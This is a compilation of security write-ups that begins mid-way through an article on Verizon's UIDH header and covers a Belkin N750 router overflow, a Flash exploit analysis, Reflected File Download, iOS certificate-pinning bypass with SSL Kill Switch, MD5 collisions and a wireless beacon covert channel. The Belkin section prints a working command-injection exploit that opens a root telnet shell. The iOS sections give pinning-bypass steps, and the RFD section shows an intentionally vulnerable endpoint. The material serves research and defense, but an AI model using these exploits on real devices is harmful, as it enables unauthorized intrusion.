The only way to block the use of the UIDH system is to use a VPN and/or Tor for your online browsing. Tor is usually your go-to software for privacy, but it can be difficult to set up on a mobile; almost all smartphones, however, have a VPN mode baked in, and Hoffman-Andrews recommended users activate it to maintain online anonymity.

"The only way, in the short term, to stop this is if enough people complain about it," Hoffman-Andrews said. "Longer term, once we get encryption across the whole internet, this kind of thing will be less of an issue. But that's 10 or 20 years away at least." ®

Source: EFF: VPNs will crumble Verizon's creepy supercookie stalkers • The Register
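The article says the header is visible to any web server one visits, which also means a site operator can measure how much of its own traffic arrives tagged. The script below is an added example, not code from the article or the EFF: it parses raw HTTP/1.x requests as a server would see them, reports which injected tracking headers are present, and summarises how many distinct identifiers appear in a log. The sample requests are constructed, and the header name X-UIDH is the name reported for Verizon's token and is an assumption of this example (the article only calls it "UIDH").

```python
"""Spot carrier-injected tracking headers in plaintext HTTP requests.

Added example, not part of the article.  SAMPLE_REQUESTS is constructed;
"X-UIDH" is the header name reported for Verizon's UIDH token and is an
assumption here (the article only calls it "UIDH")."""

# Lower-cased names of headers treated as injected subscriber identifiers.
TRACKING_HEADERS = {"x-uidh"}


def parse_request_headers(raw_request):
    """Split a raw HTTP/1.x request into (request_line, {name: value}).

    Header names are lower-cased because HTTP header names are
    case-insensitive; malformed header lines are skipped, not raised on."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_tracking_headers(raw_request):
    """Return the sorted list of injected tracking header names present."""
    _, headers = parse_request_headers(raw_request)
    return sorted(name for name in headers if name in TRACKING_HEADERS)


def audit_requests(raw_requests):
    """Summarise a request log: how many requests carry an identifier and
    how many distinct identifiers (i.e. trackable subscribers) appear."""
    tagged = 0
    ids = set()
    for req in raw_requests:
        _, headers = parse_request_headers(req)
        for name in TRACKING_HEADERS:
            if name in headers:
                tagged += 1
                ids.add((name, headers[name]))
    return {"total": len(raw_requests), "tagged": tagged, "distinct_ids": len(ids)}


# Constructed sample requests as a web server would log them.  The token
# values are made up; a real UIDH is an opaque string set by the carrier.
SAMPLE_REQUESTS = [
    "GET /bikes HTTP/1.1\r\nHost: example.test\r\nX-UIDH: OTgxNTk2NDk0\r\n\r\n",
    "GET /bikes/road HTTP/1.1\r\nHost: example.test\r\nx-uidh: OTgxNTk2NDk0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: constructed\r\n\r\n",
    "POST /cart HTTP/1.1\r\nHost: example.test\r\nX-UIDH: MTIzNDU2Nzg5\r\n"
    "Content-Length: 0\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(parse_request_headers(req)[0], find_tracking_headers(req))
    print(audit_requests(SAMPLE_REQUESTS))
```

Two requests in the sample carry the same token, so the audit reports three tagged requests but only two distinct identifiers, which is exactly the cross-site linkage the article describes. The check only ever fires on plaintext HTTP: a carrier cannot add a header inside a TLS session or a VPN tunnel, which is why the article's VPN advice works.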
-
[h=1]From 0-day to exploit – Buffer overflow in Belkin N750 (CVE-2014-1635)[/h] Vulnerability Summary A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network. Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router. Vulnerability Discovery Fuzzing plays an important role in vulnerability discovery and this time was not different. After some fuzzed requests I noticed that the POST parameter “jump” suffered from a classic buffer overflow with a payload containing 5000 bytes. After the referred buffer overflow the process died. This behavior was consistent with a traditional buffer overflow and the question that popped in my mind was if this was exploitable. To try to clear this out I considered two possible approaches to be able to analyze the vulnerable process: Virtualization of the router process – would enable the debugging of the mips32 process in an x86 machine but probably needed some binary patching or function injection to bypass hardware or configuration access limitations on QEMU. Patching the router firmware – Would enable to open a backdoor and to put debugging tools inside the router with some risk of bricking the router in the process. In the first stage of the investigation I decided that virtualization of the affected process was the simplest and less risky approach to investigate the exploitability of this vulnerability. To get this done I downloaded the firmware to identify the process responsible for the crash. After binwalking the firmware and finding a linux mips32 system, both virtualization and patching approaches seemed viable since all files were extracted without problems. 
Binwalk extracted the squashfs filesystem from the image, and in few minutes the router filesystem was available to further analysis. By analyzing the strings in the http and minhttp binaries, it was possible to discover that the webserver available in the guest wifi network where the buffer overflow occurred was in fact minhttp. The Virtualization As stated above, to better analyse this vulnerability I decided to virtualize the minhttp process. For that I used qemu-mipsel-static since there is a lot of info about the subject and I had previous successful experiences with it. At first try qemu-mipsel-static refused to execute the minhttp deamon: The error “Can’t bind to any address” in this context means that the process is trying to bind to an IP address that does not exist on the system. A grep on the binary immediately discloses the IP address where the process was trying to bind. With the correct IP address on the interface, qemu is finally able to run the process, but after trying to access the contents of the site strace shows us that the CWD is wrong and that the process running with a wrong current working directory is not able to get and present the html files. This happens because the execution of the qemu must be done on a chroot of the firmware, which means that the execution of the binary will have the root of the file system of the firmware as CWD and not the /www as expected by minhttpd. To solve this issue I remembered of two possible approaches and both worked. The first was to use LD_PRELOAD to load a custom library hooking a used function in minhttpd and that function executes the Change Directory. The second was to use the binfmt module to execute in a seamless manner the mips32 binary and instead of executing the minhttpd directly from qemu I executed the mips32 /bin/sh inside the chroot of the firmware and then changed the CWD to the correct place before executing the minhttpd binary using the mips32 /bin/sh. 
To configure the binfmt I used the following signature: echo ‘:mipsel:M::\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00:\xff\xff\xff \xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff:/usr/bin/qemu-mipsel-static:’ > /proc/sys/fs/binfmt_misc/register The following image shows the execution of the mips32 process on an x86 system using binfmt: After all the tweaks necessary to put the process running I activated the instruction tracing in QEMU (-d in_asm,cpu) and confirmed the exploitability: Ok now, I had confirmation that this vulnerability could be exploited with a payload with mips32 machine code. While trying to identify the correct amount of bytes I used incremental buffers and noticed that the minhttp process had different behaviors with different payload sizes: Bellow ±1300 bytes the request was correctly handled Above ±1300 and below ±2000 the minhttp process returned an empty http response Above ±2000 bytes the minhttp process crashed It seemed that a buffer size between ±1300 and ±2000 crashed something, but was not enough to crash the process. This strange behavior needed a deeper analysis and quickly after stracing the process I had confirmation that this vulnerability was much more than a simple buffer overflow with remote machine code execution. The strace below shows that buffers bigger than ±1300 bytes trigger some kind of execution using /bin/sh. With a payload that is big enough, it is possible to execute the string on the request as we can see on the underlined execve(). But how to take advantage of this backdoor-like vulnerability? The Disassembler came in my help. Reverse Engineering for the root cause Using the IDAPro disassembler I was able to identify the problem, the overflow occurred due to the usage of the insecure strcpy() function. 
The vulnerability exists due to improper buffer handling using the strcpy() function at address 0x00402570, as presented in the image below: the source buffer processed by strcpy() comes from the POST parameter "jump" and is returned by the get_cgi() function at 0x00402550. The buffer overflow enables control of a variable named do_xread, located in the heap, that is used to decide whether CGIs are executed. The decision point occurs at address 0x0040338C, where the $v1 register, holding the value of the overwritten do_xread, is compared with zero. The CGI execution is done using the popen() function, as we can see at address 0x004033D0. The popen() function opens a process by creating a pipe, forking, and invoking the shell, so the argument to popen() is supposed to be a pointer to a null-terminated string containing a shell command line that will be passed to /bin/sh using the -c flag. The name of the CGI to be executed is also in the heap, somewhere between 0x004476D0 and 0x00447AD0, near do_xread. Since the two variables are conveniently near each other, it is possible with only one oversized payload processed by strcpy() to overwrite both do_xread (the control variable) and byte_4476D0 (the variable with the name of the CGI to be executed). As described before, the name of the CGI is processed with popen(), so instead of a file name we can inject several commands at once, separated for instance by a semicolon. This vulnerability enables control over a part of heap memory where a variable that forces the execution of a CGI and the variable with the name of the CGI to be executed are both stored. In conclusion, the requirements for injecting commands are fulfilled.
Vulnerability Exploitation

An attacker could exploit this vulnerability by preparing a special POST where the parameter "jump" takes some padding (1379 bytes) concatenated with the commands to be executed and with something different from zero to overwrite do_xread and enter the section of code that invokes popen() by failing the BEQZ jump at address 0x0040338C. The image below shows the execution of utelnetd using this exploit.

Exploit Code

The following Python code to exploit this vulnerability enables the execution of commands in the router; in this case the telnet service is started, and by default the login program is /bin/sh so… with no login prompt.

#!/usr/bin/python
# Title    : Belkin n750 buffer overflow in jump login parameter
# Date     : 28 Jan 2014
# Author   : Discovered and developed by Marco Vaz <mv@integrity.pt>
# Tested on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)
import httplib

headers = {}
body = "GO=&jump=" + "a"*1379 + "%3b" + "/usr/sbin/utelnetd -d" + "%3b&pws=\n\n"
conn = httplib.HTTPConnection("192.168.169.1", 8080)
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data

I have developed a Metasploit module to exploit this vulnerability that also executes iptables commands so that it is possible to access the telnet server directly from the guest network to the root shell. You can get it here: belkin_rce_cve-2014-1635.rb.

Written by Marco Vaz

Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/
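A defender-side check for the pattern described in this post (an over-long "jump" POST parameter reaching an unbounded strcpy(), with the tail of the buffer later handed to popen()). This is an added example, not the article's or the vendor's code; the length threshold, the route check and the sample requests are constructed.

```python
"""Flag login.cgi POSTs whose "jump" parameter is oversized or carries shell
metacharacters, the two properties the Belkin N750 bug needs.  Added example;
threshold and sample traffic are constructed, not taken from the article."""
import re
from urllib.parse import parse_qs

# The article saw the behaviour change above roughly 1300 bytes; a lower
# limit (assumption) leaves margin for a proxy- or log-side check.
JUMP_LENGTH_LIMIT = 1024
# Characters that let a string passed to popen()/sh -c run extra commands.
SHELL_META = re.compile(r"[;&|`$\n]")


def parse_post(raw):
    """Split a raw HTTP/1.x request into (path, form_fields).

    Only application/x-www-form-urlencoded POST bodies are decoded; any other
    method yields an empty field dict.  Percent-encoding is decoded so that
    %3b becomes ';' exactly as the router would see it.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) < 2:
        return "", {}
    method, path = parts[0], parts[1]
    if method != "POST":
        return path, {}
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return path, {name: values[0] for name, values in fields.items()}


def inspect_request(raw):
    """Return a list of findings for one request; empty means nothing odd."""
    path, fields = parse_post(raw)
    findings = []
    if not path.split("?")[0].endswith("/login.cgi") or "jump" not in fields:
        return findings
    jump = fields["jump"]
    if len(jump) > JUMP_LENGTH_LIMIT:
        findings.append(f"oversized jump parameter ({len(jump)} bytes)")
    if SHELL_META.search(jump):
        findings.append("shell metacharacters in jump parameter")
    return findings


# Constructed sample requests (not captures from a real device).
BENIGN = (b"POST /login.cgi HTTP/1.1\r\nHost: router\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          b"GO=&jump=status.html&pws=secret")
SUSPICIOUS = (b"POST /login.cgi HTTP/1.1\r\nHost: router\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              b"GO=&jump=" + b"a" * 1379 + b"%3bid%3b&pws=")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, inspect_request(sample) or "ok")
```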
-
Cracking the CVE-2014-0569 nutshell
msft-mmpc 5 Nov 2014 5:00 PM

The Microsoft Malware Protection Center (MMPC) has recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-0569. This exploit is being integrated into the Fiesta exploit kit. The vulnerability related to this malware was addressed with a patch released by Adobe on 14 October 2014. Adobe Flash Player desktop runtime for Windows versions 15.0.0.167 and earlier are vulnerable. If you're using a vulnerable Adobe Flash Player version you should update now to help protect your PC.

We analyzed how these attacks work and found the following details. The exploit successfully bypasses the validation of the memory range and is able to access an arbitrary location. It attempts to corrupt the VTABLE entry for the virtual function toString() of the Sound object. Later, the ActionScript calls the Sound.toString() method and control is transferred to the controlled address, as shown in Figure 1.

Figure 1: Transfer control via a corrupted VTABLE Sound.toString()

At the controlled address, it starts the ROP gadgets built from the Flash Player DLL, as shown in Figure 2.

Figure 2: Control transferred to ROP gadgets

These ROP gadgets are a bit convoluted, but they can be summarized in the following steps:

1) The gadgets prepare the data on the stack using a loop of the following gadgets:
    dec eax                    // decrement the address to build code
    ret
    pop ecx                    // store the code bytes in ECX
    ret
    mov dword ptr [eax],ecx    // store the code to the address specified by EAX
    pop ebp
    ret
2) Control is passed (via a ret instruction) to the API VirtualAlloc() to allocate a 0x1000 byte buffer.
3) It uses the gadget:
    mov dword ptr [eax],ecx    // store the code
    pop ebp
    ret
   to build some new gadgets at the start of the allocated buffer, for example:
    mov dword ptr [eax+0Ch],ecx
    ret
4) These new gadgets build up a small piece of two-layer decryption code to decrypt the shellcode.
5) Control is passed over to the fully decrypted shellcode.
The shellcode downloads a file from the remote server and executes it. The downloaded file is detected as TrojanDropper:Win32/Ropest.A.

As well as keeping your software up-to-date, we also recommend running a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats.

Chun Feng
MMPC

SHA1:
468f23ef2f6318ea59a3cbc5570ac766435a5315 (detected as Exploit:SWF/Fiexp.B)
61a776fda7d50655ea336b22499573250fa8761d (detected as TrojanDropper:Win32/Ropest.A)

Source: Cracking the CVE-2014-0569 nutshell - Microsoft Malware Protection Center - Site Home - TechNet Blogs
-
Reflected File Download - A New Web Attack Vector

PLEASE NOTE: As promised, I've published a full white paper that is now available for download: White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif.

In October 2014, as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded.

As long as RFD is out there, users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine and include a popular, trusted domain and use a secure connection, but users still need to be wary. Look at the following link for example. Up until a few months ago, it could have been used to steal ALL cookies from your browser, perform actions on your behalf and steal emails from your Gmail inbox:

https://www.google.com/s;/ChromeSetup.bat

Google fixed the vulnerability so that the link above now only downloads a harmless text file.

RFD, like many other Web attacks, begins by sending a malicious link to a victim. But unlike other attacks, RFD ends outside of the browser context:

1) The user follows a malicious link to a trusted web site.
2) An executable file is downloaded and saved on the user's machine. All security indicators show that the file was "hosted" on the trusted web site.
3) The user executes the file which contains shell commands that gain complete control over the computer.

Figure 1 – The three-step attack flow of Reflected File Download

For a Reflected File Download attack to be successful, there are three simple requirements:

1) Reflected – Some user input is being "reflected" to the response content. This is used to inject shell commands.
2) Filename – The URL of the vulnerable site or API is permissive and accepts additional input. This is often the case and is used by attackers to set the extension of the file to an executable extension.
3) Download – The response is being downloaded and a file is created "on-the-fly" by the Web browser. The browser then sets the attacker-controlled filename that was parsed in requirement 2 above.

Figure 2 – A service is vulnerable if the three RFD requirements are met

Full article and video: Reflected File Download - A New Web Attack Vector - SpiderLabs
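The three requirements above, turned into code: a minimal JSONP-style endpoint in its RFD-prone form, the hardened form (strict callback validation, exact route match, a fixed Content-Disposition filename and nosniff), and a checker that maps a request/response pair onto the three requirements. This is an added example, not code from Oren Hafif's paper or from any real API; the route name, headers and sample inputs are constructed.

```python
"""RFD-prone vs hardened JSONP endpoint, plus a checker for the three RFD
requirements (reflected, filename, download).  Added example with a
constructed route; not the paper's or any vendor's code."""
import json
import re

ROUTE = "/api/search"                      # constructed endpoint name
CALLBACK_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


def respond_unsafe(path, callback):
    """RFD-prone: reflects the callback verbatim and accepts any URL tail
    after the route, so the browser may derive the file name from the URL."""
    if not path.startswith(ROUTE):          # "/api/search;/setup.bat" passes
        return 404, {}, ""
    payload = json.dumps({"results": []})
    body = f"{callback}({payload});"
    return 200, {"Content-Type": "application/json"}, body


def respond_safe(path, callback):
    """Hardened: exact route match, allowlisted callback, fixed filename."""
    if path != ROUTE:                       # no ";" parameters or extra segments
        return 404, {}, ""
    if not CALLBACK_RE.match(callback):
        err = json.dumps({"error": "bad callback"})
        return 400, {"Content-Type": "application/json"}, err
    payload = json.dumps({"results": []})
    body = f"{callback}({payload});"
    headers = {
        "Content-Type": "application/json",
        # A server-chosen name: the browser will not use the URL tail.
        "Content-Disposition": 'attachment; filename="api.json"',
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


def rfd_requirements(path, user_input, status, headers, body):
    """Evaluate the three RFD requirements for one observed exchange.

    reflected: the raw user input appears in a 200 response body.
    filename:  the server answered 200 to a path that is not the exact route,
               i.e. the URL tail (where an attacker puts the extension) was
               accepted as part of the request.
    download:  no server-fixed filename is forced via Content-Disposition, so
               a download would take its name from the URL.
    """
    reflected = status == 200 and user_input in body
    filename = status == 200 and path != ROUTE
    disposition = headers.get("Content-Disposition", "")
    download = status == 200 and 'filename="' not in disposition
    return {"reflected": reflected, "filename": filename, "download": download}


if __name__ == "__main__":
    probe_path = ROUTE + ";/setup.bat"      # constructed permissive URL tail
    probe_input = "x||echo||"               # constructed reflected payload
    for fn in (respond_unsafe, respond_safe):
        status, headers, body = fn(probe_path, probe_input)
        print(fn.__name__, rfd_requirements(probe_path, probe_input,
                                            status, headers, body))
```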
-
Intercepting the App Store's Traffic on iOS

TL;DR: By default, MobileSubstrate tweaks do not get injected into system daemons on iOS, which explains why my SSL Kill Switch tool wasn't able to disable SSL certificate validation in the iTunes App Store.

The problem

Last year I released the iOS SSL Kill Switch, a tool designed to help penetration testers decrypt and intercept an application's network traffic by disabling the system's default SSL certificate validation as well as any kind of custom certificate validation (such as certificate pinning). While the tool worked well on most applications, including SSL-pinning apps such as Twitter or Square, users reported that it didn't work on the iTunes App Store, which would still refuse to connect to an intercepting proxy impersonating the iTunes servers. Other similar tools such as Intrepidus Group's trustme also seemed to have the same limitation.

A quick look at the App Store on iOS

The first step was to get the right setup:
An intercepting proxy (Burp Pro) running on my laptop.
An iPad with the SSL Kill Switch installed, and configured to use my laptop as the device's proxy.

After starting the App Store app, I noticed that I could already intercept and decrypt specific SSL connections initiated by the App Store: all the HTTP requests to query iTunes for available apps (as part of the App Store's tabs such as "Featured", "Top Charts", etc.) as well as app descriptions ("Details", "Reviews"). However, more sensitive operations including user login or app installation and purchase would fail by rejecting my intercepting proxy's invalid SSL certificate. From looking at logs on the device, it turns out that two distinct processes are behind the App Store's functionality:

AppStore[339] <Warning>: JS: its.sf6.Bootstrap.init: Initialize
itunesstored[162] <Error>: Aug 22 11:29:10 SecTrustEvaluate [root AnchorTrusted]

AppStore is the actual App Store iOS application that you can launch from the Springboard.
It is responsible for displaying the App Store UI to the user. itunesstored is a daemon launched at boot time by launchd, the process responsible for booting the system and managing services/daemons. itunesstored seems to be responsible for the more sensitive operations within the App Store (login, app purchase, etc.) and possibly some of the DRM/Fairplay functionality.

Why SSL Kill Switch didn't work

I initially thought the issue to be that the strategy used by the SSL Kill Switch to disable certificate validation somehow wasn't enough to bypass itunesstored's certificate pinning. However, it turns out that the SSL Kill Switch was just not being injected into the itunesstored process at all, for a couple of reasons:

The itunesstored process is started as a daemon by launchd early during the device's boot sequence, before MobileSubstrate and MobileLoader get started. Therefore, none of the MobileSubstrate tweaks installed on the device, including the SSL Kill Switch, get injected into this process.

The SSL Kill Switch had a MobileLoader filter so that the code disabling certificate validation would only be loaded into apps linking the UIKit bundle (i.e. applications with a user interface). This was initially done to restrict the effect of the SSL Kill Switch to App Store apps only. However, itunesstored is a daemon that doesn't have a user interface, hence the filter prevented MobileLoader from injecting the SSL Kill Switch into the process.

Man-in-the-Middle on itunesstored

After figuring this out, getting itunesstored to stop validating SSL certificates was very straightforward. First of all, make sure you're using the latest version of the SSL Kill Switch (at least v0.5). Then, all you need to do is kill the itunesstored process:

iPad-Mini:~ root# ps -ef | grep itunesstored
  501   170     1   0  0:00.00 ??         0:01.95 /System/Library/PrivateFrameworks/iTunesStore.framework/Support/itunesstored
    0   432   404   0  0:00.00 ttys000    0:00.01 grep itunesstored
iPad-Mini:~ root# kill -s KILL 170

When doing so, launchd will automatically restart itunesstored. This time however, MobileLoader will inject the SSL Kill Switch's code into the process. You can validate this by looking at the device's logs, for example using the Xcode console. You should see something like this:

itunesstored[1045] <Notice>: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/SSLKillSwitch.dylib
itunesstored[1045] <Warning>: SSL Kill Switch - Hook Enabled.

If you restart the App Store app, you should then be able to proxy all the traffic and see App Store transactions such as logins or app downloads. If you try to install an app while proxying, your proxy might crash or freeze when the App Store tries to download the app because IPA files can be fairly large (200+ MB).

Takeaway

A similar methodology could be used to proxy other system daemons including, for example, accountsd, which is responsible for the Twitter and Facebook integration that was added to iOS 5 and iOS 6. While working on this, I also discovered a better way to disable SSL certificate validation and certificate pinning in iOS apps. Hence, SSL Kill Switch v0.5 is actually a complete rewrite. If you're interested in knowing how it works, I wrote a blog post explaining what the tool does.

Source: https://nabla-c0d3.github.io/blog/2013/08/20/intercepting-the-app-stores-traffic-on-ios/
-
iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill Switch - Prateek Gianchandani

In this article, we will look at how we can analyze network traffic for applications that use certificate pinning. One of the best definitions I found of certificate pinning is mentioned below. It is taken directly from this url.

By default, when making an SSL connection, the client checks that the server's certificate:
has a verifiable chain of trust back to a trusted (root) certificate
matches the requested hostname

What it doesn't do is check if the certificate in question is a specific certificate, namely the one you know your server is using. Relying on matching certificates between the device's trust store and the remote server opens up a security hole. The device's trust store can easily be compromised – the user can install unsafe certificates, thus allowing potential man-in-the-middle attacks. Certificate pinning is the solution to this problem. It means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device's trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device.

Certificate pinning is used by many popular applications, e.g. Twitter, Square etc. So the question that arises is, how do you bypass this certificate validation that is happening on the client side? The important thing to note here is that all the validation is happening on the client side. And since there are frameworks like Mobile Substrate that allow us to patch any method during runtime and modify its implementation, it is possible to disable the certificate validation that is happening in the application. A PoC tool for this was released at Black Hat and it was named iOS SSL Kill Switch.
The full presentation can be found here. After some time, the author realized that he was able to inspect traffic from apps that used certificate pinning (e.g. Twitter), but he wasn't able to see the traffic going through the App Store app. He then realized he needed to patch even more low-level methods and kill specific processes in order to inspect traffic going via the App Store app. The full writeup for this can be found here and it's quite interesting, so I suggest you give it a read. Also note that this tool will also be able to disable the default SSL certificate validation, so you don't need to install a certificate as trusted root as well, which is what we usually do for inspecting traffic over HTTPS.

To really check that the Twitter app uses certificate pinning, install the Twitter app and route the device traffic through Burp Proxy. Make sure you are inspecting traffic via HTTP/HTTPS using the steps mentioned in Part 11 of this series. However, when you open the Twitter app and navigate around, the traffic is not captured by Burp Suite.

To inspect the traffic going via Twitter, ssh into your device and download the iOS SSL Kill Switch package from its releases link. Also, make sure to install the following packages via Cydia.
dpkg
MobileSubstrate
PreferenceLoader

Now install the deb package using the command dpkg -i . Now, respring the device using the command killall -HUP SpringBoard. Once this is done, go to the Settings app. There will be a new menu for SSL Kill Switch and a slider to Disable certificate validation. Make sure the slider is set to on. Now route the traffic in the device to pass through Burp Proxy. Open the Twitter app and now you can see all the data going through via the Twitter app as well.

To verify that SSL Kill Switch is being injected into the application, go to Xcode -> Devices (I am using Xcode 6), look for your device in the left menu and click on the arrow pointing up in the lower left corner to see the device logs. You will see that SSL Kill Switch is being injected into the application.

Another cool utility that does the same job is trustme. I recommend you check it out.

Source: iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill Switch - Prateek Gianchandani
-
Crypto collision used to hijack Windows Update goes mainstream
Final nail in the coffin for the MD5 hash
By John Leyden, 5 Nov 2014

The cryptographic hash collision attack used by cyberspies to subvert Microsoft's Windows Update has gone mainstream, revealing that MD5 is hopelessly broken. Security researcher Nat McHugh created two images of different rock 'n' roll icons - James Brown and Barry White - with the same MD5 hash.

"The images were just two I lifted from the web ... in fact I could have chosen any image or indeed any arbitrary data and created a collision with it," McHugh reports.

The process of computing padding data to produce the collision between two dissimilar image files was carried out on a mainstream cloud computing instance in a matter of hours at a cost estimated by McHugh as being less than a dollar. Brute force attempts to find cryptographic hash collisions – where two dissimilar files give the same hash value – are still impractical for anyone without access to a supercomputer. What McHugh was able to do was to add binary data to the end of two different JPEG images such that the two modified files gave the same hash value. Chosen-prefix collisions for MD5 of this type were first successfully demonstrated in 2007. In a chosen-prefix collision, the data preceding the specially crafted collision blocks can be completely different, as is the case with the images of the Godfather of Soul and the Walrus of Love.

In a blog post, McHugh explains how he was able to work out what binary data to add to the end of the two image files. The chosen-prefix collision attack works by repeatedly adding 'near collision' blocks which gradually work to eliminate the differences in the internal MD5 state until they are the same. Before this can be done the files must be of equal length and the bit differences must be of a particular form. This requires a brute force 'birthday' attack which tries random values until two are found that work.
It does however have a much lower complexity than a complete brute force attack. Another researcher, Marc Stevens, has created a framework for automatically finding differential paths and using them to create chosen-prefix collisions: https://code.google.com/p/hashclash/ . McHugh chose to run Stevens's HashClash research tool on Linux, using a bash script to automate the repetitive steps needed, on an AWS GPU instance. "I found that I was able to run the algorithm in about 10 hours on an AWS large GPU instance" at a cost of around $0.65 plus tax per crack, according to McHugh.

McHugh concludes that his exercise proves MD5 is hopelessly weak, outdated and no longer fit for purpose.

MD5 is well and truly broken. Whilst the two images have not shown a break in the pre-image resistance or second pre-image resistance, I cannot think of a single case where the use of a broken cryptographic hash function is an appropriate choice.

It was a chosen-prefix collision attack similar to this that was used to produce a counterfeit SSL certificate used to sign the Flame malware as Microsoft and pass itself off as a Windows update. Other security experts were inclined to agree with McHugh's conclusion that MD5 is a dead duck.

"If you can't even distinguish between Barry White and James Brown, it's time to send MD5 to hashing algorithm heaven," said Martijn Grooten, editor of Virus Bulletin and sometime security researcher, in a Twitter update.

A cryptographic hash algorithm such as MD5 converts data into a shortened "message digest" from which it ought to be impossible to recover the original information. This one-way technique is used to generate digital signatures for software downloads, among other functions.

Bootnote

Flame used a chosen-prefix collision attack against MD5 in order to generate a rogue CA certificate. The sophisticated malware, discovered in 2012 but probably circulating since 2010, was used in a cyber-espionage attack against Middle Eastern countries. Most of the infected systems were located in Iran. The Washington Post claimed in June 2012 that Flame had been jointly developed by the NSA and Israel's military as part of the same Olympic Games operation that spawned Stuxnet. Put very simply, Flame carried out surveillance and mapped networks while Stuxnet sabotaged the control systems of nuclear processing centrifuges.

Source: Crypto collision used to hijack Windows Update goes mainstream • The Register
-
Smuggler - An interactive 802.11 wireless shell without the need for authentication or association I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective. This additional information that I speak of is known as “Information Elements” (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, “IEs are a device’s way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification.” With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved. I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept, the code for this is below. 
[receiver.py]

#!/usr/bin/python
# -*- coding: utf-8 -*-
# wireless information elements receiver POC - Tom Neaves <tneaves@trustwave.com>
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

def packets(pkt):
    if pkt.haslayer(Dot11):
        # if management frame and beacon and SSID is blank
        if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "":
            print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, pkt[Dot11Elt:2].info)

sniff(iface="mon0", prn=packets)

This would extract the "SSID" and the "rates" IEs from all beacon management frames discovered which had a blank SSID. I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets.

[sender.py]

#!/usr/bin/python
# -*- coding: utf-8 -*-
# wireless information elements sender PoC - Tom Neaves <tneaves@trustwave.com>
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import sys
from scapy.all import *

conf.iface = "mon1"     # second wireless card
ssid = sys.argv[1]      # takes ssid from the command line
rates = sys.argv[2]     # takes "rates" from the command line

def SendRates(rates):
    frame = (RadioTap()
             / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=RandMAC(), addr3=RandMAC())
             / Dot11Beacon(cap="ESS")
             / Dot11Elt(ID="SSID", len=len(ssid), info=ssid)
             / Dot11Elt(ID="Rates", info=rates)
             / Dot11Elt(ID="DSset", info="\x03")
             / Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"))
    sendp(frame, verbose=1)

SendRates(rates)

# python sender.py "" rateshere

The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a "rates" information element of "rateshere". The receiver will parse the frame and print the rates content out to the screen, in this case "rateshere".
